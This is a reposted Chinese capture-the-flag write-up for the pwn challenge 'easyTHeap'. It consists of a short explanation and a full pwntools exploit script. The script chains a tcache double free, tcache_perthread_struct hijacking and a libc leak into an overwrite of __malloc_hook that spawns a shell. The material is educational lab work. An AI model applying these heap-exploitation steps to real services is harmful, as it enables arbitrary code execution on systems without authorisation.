[V&N2020 公开赛]easyTHeap

在这里插入图片描述
ubuntu18.04 的 libc-2.27 带有 Tcache 机制,而题目附带的这个版本的 tcache 还没有 double free 检测;这道题 malloc 得到的指针数组在 free 时没有置空,留下悬垂指针,同一个 chunk 可以反复 free / show / edit。利用思路:tcache double free 泄露堆地址 → 改 fd 把 tcache_perthread_struct 本身申请出来 → 改写 counts 让下一次 free 进 unsorted bin 泄露 libc → 改写 entries 把 chunk 分配到 __malloc_hook 附近,写 hook 拿 shell。

exp

from pwn import *

# Echo every byte sent/received so the two leak parses below can be checked by eye.
context.update(log_level='debug')

def pause_debug():
    """Log the target PID(s) and block until Enter so gdb can be attached by hand."""
    pids = proc.pidof(p)
    log.info(pids)
    pause()

def add(size):
    """Menu option 1: allocate a chunk of ``size`` bytes.

    Slot indices appear to be handed out sequentially by the binary (see the
    ``# 0``, ``# 1`` annotations at the call sites) -- confirm before reusing.
    """
    menu = p.sendlineafter
    menu('choice:', str(1))
    menu('size?', str(size))

def edit(idx, content):
    """Menu option 2: write ``content`` (bytes) into slot ``idx``."""
    menu = p.sendlineafter
    menu('choice:', str(2))
    menu('idx?', str(idx))
    # Raw send on purpose: a newline appended by sendlineafter would end up
    # inside the crafted tcache / hook payload.
    p.sendafter('content:', content)

def show(idx):
    """Menu option 3: print slot ``idx``; the caller reads the leaked bytes afterwards."""
    menu = p.sendlineafter
    menu('choice:', str(3))
    menu('idx?', str(idx))

def delete(idx):
    """Menu option 4: free slot ``idx``.

    The binary does not clear the slot, so the same index can be freed,
    shown and edited again -- that dangling pointer is the whole bug.
    """
    menu = p.sendlineafter
    menu('choice:', str(4))
    menu('idx?', str(idx))

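proc_name = './vn_pwn_easyTHeap'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 26415)
elf = ELF(proc_name)
libc = ELF('./libc-2.27.so')

# A 0x100 request becomes a 0x110 chunk; its tcache bin index is
# (0x110 - 0x20) / 0x10 == 15.  Used for the counts[]/entries[] offsets below.
TC_IDX = (0x110 - 0x20) // 0x10

# --- 1. tcache double free -> heap leak -------------------------------------
add(0x100)  # idx 0: the chunk we free over and over
add(0x18)   # idx 1: sits between chunk 0 and top so chunk 0 never consolidates
delete(0)
delete(0)   # slot is not nulled -> second free is accepted by this tcache
show(0)
# The chunk's tcache "next" points at its own user data (heap+0x260); minus 0x250
# gives the user pointer of tcache_perthread_struct (heap+0x10).
# recvn(6), not recv(6): recv may return fewer bytes if the output is fragmented.
heap_addr = u64(p.recvn(6).ljust(0x8, b'\x00')) - 0x250
if (heap_addr - 0x10) & 0xfff:
    log.error('heap leak does not look page-aligned: %#x' % heap_addr)

# --- 2. poison the bin so a 0x110 request returns tcache_perthread_struct -----
add(0x100)               # idx 2: first copy of chunk 0 leaves the bin
edit(2, p64(heap_addr))  # the remaining copy now has fd = heap+0x10
add(0x100)               # idx 3: second copy
add(0x100)               # idx 4 == tcache_perthread_struct itself

# --- 3. mark the 0x110 bin full so the next free bypasses tcache -------------
edit(4, b'\x07'.rjust(0x10, b'\x00'))  # counts[TC_IDX] = 7
delete(0)  # 0x110 is above fastbin range -> unsorted bin, fd/bk point into libc
show(0)
# fd of a lone unsorted chunk is &main_arena.top (main_arena + 96); 0x3ebca0 is
# that offset in this specific libc-2.27 build (4111520 in the original script).
libc_base = u64(p.recvn(6).ljust(0x8, b'\x00')) - 0x3ebca0
if libc_base & 0xfff:
    log.error('libc leak does not look page-aligned: %#x' % libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
# Build-specific one_gadget offset; re-run one_gadget if the libc changes.
one_gadget = libc_base + 0x4f322

# The payload below writes __realloc_hook then __malloc_hook through one pointer
# (malloc_hook - 8), so verify that layout against the symbol table before trusting it.
realloc_hook = libc_base + libc.sym['__realloc_hook']
if realloc_hook != malloc_hook - 8:
    log.error('unexpected hook layout: __realloc_hook is not directly below __malloc_hook')

# --- 4. rewrite tcache: counts[TC_IDX] = 1, entries[TC_IDX] = __malloc_hook - 8 ----
# tcache_perthread_struct (2.27): counts[64] one byte each at 0x00, entries[64] at 0x40.
counts = b'\x01'.rjust(0x10, b'\x00')
payload = counts.ljust(0x40 + 8 * TC_IDX, b'\x00') + p64(malloc_hook - 8)
edit(4, payload)
add(0x100)  # idx 5: tcache returns __malloc_hook - 8 without any size check
# __realloc_hook = one_gadget, __malloc_hook = realloc+8.  Bouncing through
# realloc (skipping its first instructions) is presumably there to satisfy the
# gadget's stack constraint -- verify with one_gadget if it fails to pop a shell.
edit(5, p64(one_gadget) + p64(realloc + 8))
add(0x100)  # malloc -> __malloc_hook -> realloc+8 -> __realloc_hook -> one_gadget
p.interactive()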

在这里插入图片描述


转载自blog.csdn.net/weixin_43833642/article/details/107166551